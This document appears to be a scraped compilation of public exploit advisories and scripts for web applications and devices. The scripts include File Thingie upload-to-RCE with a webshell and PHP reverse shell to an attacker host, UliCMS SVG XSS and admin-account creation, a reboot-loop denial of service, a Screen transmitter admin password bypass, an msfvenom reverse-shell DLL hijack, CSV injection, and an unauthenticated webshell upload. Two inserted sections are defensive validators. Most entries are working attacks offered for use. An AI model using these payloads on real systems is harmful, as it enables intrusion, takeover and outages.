------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="about_me"


------WebKitFormBoundaryYB7QS1BMMo1CXZVy--

response:

Error
GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67
Stack trace:
#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()
#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
#7 {main}

Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73
Stack trace:
#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
#6 {main}

4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)
File Thingie 2.5.7 - Remote Code Execution (RCE)

#!/usr/bin/python
# Exploit Title: File Thingie 2.5.7 - Arbitary File Upload to RCE
# Google Dork: N/A
# Date: 27th of April, 2023
# Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
# Software Link: https://github.com/leefish/filethingie
# Version: 2.5.7
# Tested on: N/A
# CVE: N/A
# Vulnerability originally discovered / published by Cakes
# Reference: https://www.exploit-db.com/exploits/47349

# Run a local listener on your machine and you're good to go

import os
import argparse
import requests
import random
import string
import zipfile
from urllib.parse import urlsplit, urlunsplit, quote


class Exploit:
    def __init__(self, target, username, password, lhost, lport):
        self.target = target
        self.username = username
        self.password = password
        self.lhost = lhost
        self.lport = lport

    def try_login(self) -> bool:
        self.session = requests.Session()
        post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"}
        response = self.session.post(self.target, data=post_body)
        if response.status_code == 404:
            print(f"[-] 404 Not Found - The requested resource {self.target} was not found")
            return False
        elif response.status_code == 200:
            if "Invalid username or password" in response.text:
                print(f"[-] Invalid username or password")
                return False
        return True

    def create_new_folder(self) -> bool:
        # Generate random string
        letters = string.ascii_letters
        self.payload_filename = "".join(random.choice(letters) for i in range(16))
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        post_body = {f"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit": "Ok"}
        print(f"[*] Creating new folder /{self.payload_filename}")
        response = self.session.post(self.target, headers=headers, data=post_body)
        if f"index.php?dir=/{self.payload_filename}" in response.text:
            print(f"[+] Created new folder /{self.payload_filename}")
            return True
        else:
            print(f"[-] Could not create new folder /{self.payload_filename}")
            return False

    def create_payload(self) -> bool:
        try:
            with zipfile.ZipFile(f"{self.payload_filename}.zip", 'w', compression=zipfile.ZIP_DEFLATED) as zip_file:
                zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"</pre>\"; die; }?>")
            print(f"[+] Zipped payload to {self.payload_filename}.zip")
            return True
        except:
            print(f"[-] Could not zip payload to {self.payload_filename}.zip")
            return False

    def upload_payload(self) -> bool:
        # Set up the HTTP headers and data for the request
        headers = {
            b'Content-Type': b'multipart/form-data; boundary=---------------------------grimlockx'
        }
        post_body = (
            '-----------------------------grimlockx\r\n'
            'Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n'
            'Content-Type: application/octet-stream\r\n\r\n'
        )
        post_body += (
            '\r\n-----------------------------grimlockx\r\n'
            'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n'
            '2000000\r\n'
            '-----------------------------grimlockx\r\n'
            f'Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n'
            'Content-Type: application/zip\r\n\r\n'
        )
        # Read the zip file contents and append them to the data
        with open(f"{self.payload_filename}.zip", "rb") as f:
            post_body += ''.join(map(chr, f.read()))
        post_body += (
            '\r\n-----------------------------grimlockx\r\n'
            'Content-Disposition: form-data; name="act"\r\n\r\n'
            'upload\r\n'
            '-----------------------------grimlockx\r\n'
            'Content-Disposition: form-data; name="dir"\r\n\r\n'
            f'/{self.payload_filename}\r\n'
            '-----------------------------grimlockx\r\n'
            'Content-Disposition: form-data; name="submit"\r\n\r\n'
            'Upload\r\n'
            '-----------------------------grimlockx--\r\n'
        )
        print("[*] Uploading payload to the target")
        response = self.session.post(self.target, headers=headers, data=post_body)
        if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text:
            print("[+] Uploading payload successful")
            return True
        else:
            print("[-] Uploading payload failed")
            return False

    def get_base_url(self) -> str:
        url_parts = urlsplit(self.target)
        path_parts = url_parts.path.split('/')
        path_parts.pop()
        base_url = urlunsplit((url_parts.scheme, url_parts.netloc, '/'.join(path_parts), "", ""))
        return base_url

    def unzip_payload(self) -> bool:
        print("[*] Unzipping payload")
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"}
        response = self.session.post(f"{self.target}", headers=headers, data=post_body)
        if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:
            print("[+] Unzipping payload successful")
            print(f"[+] You can now execute commands by browsing {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")
            return True
        else:
            print("[-] Unzipping payload failed")
            return False

    def execute_payload(self) -> bool:
        print("[*] Trying to get a reverse shell")
        cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")
        print("[*] Executing payload")
        response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}")
        print("[+] Exploit complete")
        return True

    def cleanup_local_files(self) -> bool:
        if os.path.exists(f"{self.payload_filename}.zip"):
            os.remove(f"{self.payload_filename}.zip")
            print("[+] Cleaned up zipped payload on local machine")
            return True
        print("[-] Could not clean up zipped payload on local machine")
        return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php")
    parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username")
    parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password")
    parser.add_argument("-L", "--LHOST", dest="lhost", type=str, required=True, help="Local listener ip")
    parser.add_argument("-P", "--LPORT", dest="lport", type=int, required=True, help="Local listener port")
    args = parser.parse_args()

    exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport)
    exploit.try_login()
    exploit.create_new_folder()
    exploit.create_payload()
    exploit.upload_payload()
    exploit.unzip_payload()
    exploit.execute_payload()
    exploit.cleanup_local_files()
HireHackking

Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)
2. upload malicious svg file

svg file content ===>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>

poc request:

POST /dist/admin/fm/upload.php HTTP/1.1
Host: localhost
Content-Length: 663
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABCl
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/dist/admin/fm/dialog.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
Connection: close

------WebKitFormBoundaryK3CvcSs8xZwzABCl
Content-Disposition: form-data; name="fldr"


------WebKitFormBoundaryK3CvcSs8xZwzABCl
Content-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryK3CvcSs8xZwzABCl--

3. Go to http://localhost/dist/content/SVG_XSS.svg
HireHackking

FLEX 1080 < 1085 Web 1.6.0 - Denial of Service

# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service
# Date: 2023-05-06
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Android
# CVE ID: CVE-2022-2591

#!/usr/bin/env python3

import requests
import re
import argparse
from colorama import Fore
import time


def main():
    def banner():
        print('''
    ________    _______  __
   / ____/ /   / ____/ |/ /
  / /_  / /   / __/  |   /
 / __/ / /___/ /___ /   |
/_/   /_____/_____//_/|_|

[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]
        ''')

    def reboot():
        r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')
        if 'Rebooting' in r.text:
            pass
        else:
            print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware não é vulnerável')
            quit()

    banner()
    print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')

    while True:
        try:
            reboot()
            print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware derrubado com sucesso!')
            time.sleep(1)
        except:
            # print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware está inativo')
            pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', action='store', help='Target', dest='target', required=True)
    arguments = parser.parse_args()
    try:
        main()
    except KeyError:
        quit()
HireHackking

Job Portal 1.0 - File Upload Restriction Bypass

<!--
# Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://phpgurukul.com/job-portal-project/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7855
# Version: 1.0
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps

1. Description

File Upload Restriction Bypass vulnerabilities were found in Job Portal 1.0. This allows an authenticated user to potentially obtain RCE via a webshell.

2. Proof of Concept

1. Go to the user profile >> (/jobportal/applicant/)
2. Select profile image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.png
5. Alter request in the upload... Update 'filename' to desired extension. ex: shell.php
   It is not necessary to change the content type 'image/png'.

Example exploitation request:
====================================================================================================
POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------57052814523281
Content-Length: 555
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id=
Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------57052814523281
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000
-----------------------------57052814523281
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: image/png

?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
IEND
-----------------------------57052814523281
Content-Disposition: form-data; name="savephoto"


-----------------------------57052814523281--
====================================================================================================

6. Send the request and visit your new webshell

Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami

nt authority\system

3. Solution:

Patch: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
-->
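A server-side check that closes the bypass shown above, as an added example (not part of the advisory and not Job Portal's code): the client-supplied filename and Content-Type are only a first filter, the decision is made on the file's magic bytes, an image that also carries PHP tags is rejected, and the server chooses the stored name. The sample uploads below are constructed for the demonstration.

```python
import os
import secrets

# Magic bytes of the image formats a profile photo may have -> extension the server assigns
ALLOWED_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_CLIENT_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
# Server-side code markers that must never appear inside an "image" (the polyglot in the PoC)
FORBIDDEN_MARKERS = (b"<?php", b"<?=", b"<script")


def detect_image_type(data: bytes):
    """Return the extension implied by the file's magic bytes, or None."""
    for magic, ext in ALLOWED_SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def validate_photo_upload(client_filename: str, client_content_type: str, data: bytes):
    """Decide whether an uploaded profile photo may be stored.

    Returns (accepted, reason, stored_name). The name and type reported by the
    client are attacker-controlled (the PoC renames shell.png to shell.php and
    keeps Content-Type: image/png), so they are only a cheap first filter; the
    decision is made on the bytes, and the stored name is chosen by the server.
    """
    # 1. Cheap filters on what the client claims (basename strips any path component)
    _, ext = os.path.splitext(os.path.basename(client_filename).lower())
    if ext not in ALLOWED_CLIENT_EXTENSIONS:
        return False, "extension not allowed", None
    if not client_content_type.startswith("image/"):
        return False, "content type not allowed", None

    # 2. Real decision: the bytes must start like one of the allowed formats
    detected = detect_image_type(data)
    if detected is None:
        return False, "content is not a recognised image", None

    # 3. A valid image header followed by PHP is still executable if the
    #    webserver ever maps the file to PHP; reject such polyglots outright.
    lowered = data.lower()
    if any(marker in lowered for marker in FORBIDDEN_MARKERS):
        return False, "embedded script content", None

    # 4. The server picks a random name and the extension of the detected type,
    #    so the client never influences the path or how the file is served.
    stored_name = f"{secrets.token_hex(16)}.{detected}"
    return True, "ok", stored_name


# Constructed sample uploads (not captured from the product)
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + b"\x00" * 17
PHP_POLYGLOT = PNG_HEADER + b'<?php echo "polyglot"; ?>' + b"IEND"
CLEAN_PNG = PNG_HEADER + b"IEND"


if __name__ == "__main__":
    for name, ctype, body in [
        ("shell.php", "image/png", PHP_POLYGLOT),   # the PoC request: renamed extension
        ("shell.png", "image/png", PHP_POLYGLOT),   # same bytes behind an allowed extension
        ("avatar.png", "image/png", CLEAN_PNG),     # legitimate upload
    ]:
        print(name, validate_photo_upload(name, ctype, body))
```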
HireHackking
# Exploit Title: Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)
# Exploit Author: LiquidWorm

Vendor: DB Elettronica Telecomunicazioni SpA
Product web page: https://www.screen.it | https://www.dbbroadcast.com
                  https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
Affected version: Firmware: 1.9.3
                  Bios firmware: 7.1 (Apr 19 2021)
                  Gui: 2.46
                  FPGA: 169.55
                  uc: 6.15

Summary: Screen's new radio DAB Transmitter is reaching the highest
technology level in both Digital Signal Processing and RF domain.
SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
digital adaptive precorrection and configuration flexibility, the Hot
Swap System technology, the compactness and the smart system design,
the SFT DAB are advanced transmitters. They support standards DAB,
DAB+ and T-DMB and are compatible with major headend brands.

Desc: Screen is affected by an information disclosure vulnerability
due to improper access control enforcement. An unauthenticated remote
attacker can exploit this, via a specially crafted request, to gain
access to sensitive information including usernames and source IP
addresses.

Tested on: Keil-EWEB/2.1
           MontaVista® Linux® Carrier Grade eXpress (CGX)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5776
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php

19.03.2023

--

$ curl 'http://SFTDAB/system/api/userManager.cgx'
{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}
HireHackking
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: This exploit circumvents the control and requirement of admin's
# old password and directly changes the password.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5774
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php
#
#
# 19.03.2023
#

import hashlib, datetime
import requests, colorama
from colorama import Fore, Style

colorama.init()
print(Fore.RED + Style.BRIGHT + '''
██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████
██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██
██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████
██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██
██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██
''' + Style.RESET_ALL)
print(Fore.WHITE + Style.BRIGHT + '''
ZSL and the Producers insist that no one submit any exploits of themselfs
or others performing any dangerous activities. We will not open or view them.
''' + Style.RESET_ALL)

s = datetime.datetime.now()
s = s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -', s)
t = input('Enter transmitter ip: ')
p = input('Enter desired password: ')
e = '/system/api/userManager.cgx'
# the API expects the MD5 digest of the new password, not the clear text
m5 = hashlib.md5()
m5.update(p.encode('utf-8'))
h = m5.hexdigest()
print('Your sig:', h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::changeUserPswd')
t = 'http://' + t + e
bh = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
      'Accept': 'application/json, text/plain, */*',
      'Accept-Language': 'ku-MK,en;q=0.9',
      'Accept-Encoding': 'gzip, deflate',
      'User-Agent': 'Dabber-+',
      'Connection': 'close'}
j = {'ssbtIdx': 0,
     'ssbtType': 'userManager',
     'ssbtObj': {
         'changeUserPswd': {
             'username': 'admin',
             'password': h
         }
     },
     }
r = requests.post(t, headers=bh, json=j)
if r.status_code == 200:
    print('Done.')
else:
    print('Error')
    exit(-2)
HireHackking

Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking

#Exploit Title: Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
#Date: 14/05/2023
#Exploit Author: Ahsan Azad
#Vendor Homepage: https://hubstaff.com/
#Software Link: https://app.hubstaff.com/download
#Version: 1.6.13, 1.6.14
#Tested On: 64-bit operating system, x64-based processor

Description

Hubstaff is an employee work tracker with screenshots, timesheets, billing, in-depth reports, and more. During testing, it was found that the system32 subdirectory was missing a DLL library with the name wow64log.dll that had been required by Hubstaff's setup file during installation. Hence, using Metasploit's msfvenom to create a new wow64log.dll file, the tester was able to get a reverse shell locally.

Exploit

1- Generate a dll file with the name wow64log.dll using the command:
   msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll -o wow64log.dll
2- Place the newly generated DLL in the system32 directory.
3- Start a listener on the attacker's console using:
   nc -lnvp <port_used_while_generating_DLL>
4- Launch the exe. The reverse shell will be received as:
   C:\Windows>

Attachments (For the understanding of verification team)

1.png - Showing the wow64.dll was not found by the exe.
2.png - Showing how the tester was able to generate a new dll using msfvenom on port 1337.
3.png - Showing a reverse connection received on the attacker's console at C:\Windows> by launching the exe.
HireHackking

Prestashop 8.0.4 - CSV injection

Exploit Title: Prestashop 8.0.4 - CSV injection
Application: prestashop
Version: 8.0.4
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://prestashop.com/
Software Link: https://prestashop.com/prestashop-edition-basic/
Date of found: 14.05.2023
Author: Mirabbas Ağalarov
Tested on: Windows

2. Technical Details & POC
========================================
Step 1. Login as user
Step 2. Go to My Account then Information (http://localhost/index.php?controller=identity)
Step 3. Set Email as =calc|a!z|@test.com
Step 4. If the admin exports customers as a CSV file, CSV injection occurs on the admin's computer and the calculator will open (http://localhost/admin07637b2omxxdbmhikgb/index.php/sell/customers/?_token=mtc1BTvq-Oab2lBdfCaxpOorYraGGVMiTFluJzOpkWI)

payload: =calc|a!z|@test.com
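The export-side mitigation for the payload above, as an added example (not Prestashop's code): every cell that starts with a formula trigger is prefixed with an apostrophe so the spreadsheet reads it as text, and the same check can refuse such an email when the profile is saved. The customer rows are constructed for the demonstration.

```python
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula
# (the advisory's payload starts with '=').
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def looks_like_formula(value: str) -> bool:
    """True when a spreadsheet would treat this text as a formula."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value) -> str:
    """Make a cell value inert for CSV export without losing its content.

    Numeric columns should be emitted as numbers before this pass; otherwise a
    negative amount would also be prefixed, which is safe but ugly.
    """
    if value is None:
        return ""
    text = str(value)
    if looks_like_formula(text):
        # A leading apostrophe forces text mode; the original value stays visible.
        text = "'" + text
    return text


def export_customers_csv(customers, fields) -> str:
    """Render customer dicts as CSV the way an admin export would, but safely."""
    buf = io.StringIO()
    # QUOTE_ALL also stops a cell from smuggling a field separator or newline.
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(fields)
    for customer in customers:
        writer.writerow([neutralize_cell(customer.get(f)) for f in fields])
    return buf.getvalue()


def validate_email_input(email: str) -> bool:
    """Input-side check: refuse an email that is really a formula (defence in depth)."""
    return "@" in email and not looks_like_formula(email)


# Constructed sample rows; the second email is the payload from the advisory.
SAMPLE_CUSTOMERS = [
    {"id": 1, "firstname": "Alice", "email": "alice@example.com"},
    {"id": 2, "firstname": "Mallory", "email": "=calc|a!z|@test.com"},
]
CUSTOMER_FIELDS = ["id", "firstname", "email"]


if __name__ == "__main__":
    print(export_customers_csv(SAMPLE_CUSTOMERS, CUSTOMER_FIELDS))
```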
HireHackking
# Exploit Title: Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2022.4 (22.4.2) and older
# CVE : CVE-2022-47880

Introduction
=================
An information disclosure vulnerability in `/be/rpc.php` allows remote authenticated users with the appropriate permissions to modify database connections to disclose the clear text credentials via the `test connection` function. To exploit the vulnerability, the attacker must set the host of the database connection to a server under his control.

Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

Proof of Concept
=================
1) The host part of a database connection can be changed in the connection details in the UI. Set the Host to a server that you control.
2) Test the database connection.
3) The webserver initiates a connection to the server that you control. Use Wireshark to capture network traffic and to ultimately extract the database credentials.
HireHackking

Online Pizza Ordering System v1.0 - Unauthenticated File Upload

# Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload
# Date: 03/05/2023
# Exploit Author: URGAN
# Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip
# Version: v1.0
# Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23
# CVE: CVE-2023-2246

#!/usr/bin/env python3
# coding: utf-8

import os
import requests
import argparse
from bs4 import BeautifulSoup

# command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', type=str, help='URL with http://')
parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
args = parser.parse_args()

# if no arguments are passed, ask the user for them
if not (args.url and args.payload):
    args.url = input('Enter URL with http://: ')
    args.payload = input('Enter file path PHP webshell: ')

# URL Variables
url = args.url + '/admin/ajax.php?action=save_settings'
img_url = args.url + '/assets/img/'
filename = os.path.basename(args.payload)
files = [
    ('img', (filename, open(args.payload, 'rb'), 'application/octet-stream'))
]

# send a POST request to the server
resp_upl = requests.post(url, files=files)
status_code = resp_upl.status_code
if status_code == 200:
    print('[+] File uploaded')
else:
    print(f'[-] Error {status_code}: {resp_upl.text}')
    raise SystemExit(f'[-] Script stopped due to error {status_code}.')

# send a GET request to the server
resp_find = requests.get(img_url)

# Use BeautifulSoup to parse the page's HTML code
soup = BeautifulSoup(resp_find.text, 'html.parser')

# get all <a> tags on a page
links = soup.find_all('a')

# list to store found files
found_files = []

# we go through all the links and look for the desired file by its name
for link in links:
    file_upl = link.get('href')
    # an <a> without href returns None; skip it instead of crashing on .endswith
    if file_upl and file_upl.endswith(filename):
        # uploaded file name
        print('[+] Uploaded file found:', file_upl)
        file_url = img_url + file_upl  # get the full URL of your file
        found_files.append(file_url)  # add the file to the list of found files

# if the list is not empty, then display all found files
if found_files:
    print('[+] Full URL of your file:')
    for file_url in found_files:
        print('[+] ' + file_url)
else:
    print('[-] File not found')
HireHackking

Ulicms-2023.1-sniffing-vicuna - Privilege escalation

#Exploit Title: Ulicms 2023.1 sniffing-vicuna - Privilege escalation
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: Privilege escalation
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna

import requests

new_name = input("name: ")
new_email = input("email: ")
new_pass = input("password: ")

url = "http://localhost/dist/admin/index.php"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="

response = requests.post(url, headers=headers, data=data)

if response.status_code == 200:
    print("Request is success and created new admin account")
else:
    print("Request is failure.!!")
HireHackking

RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)

# Exploit Title: RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-09-19
# Vendor Homepage: https://github.com/iwind/rockmongo/
# Software Link : https://github.com/iwind/rockmongo/
# Tested Version: 1.1.7
# Tested on: Windows 7 and 10
# Vulnerability Type: Stored Cross-Site Scripting (XSS)

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:

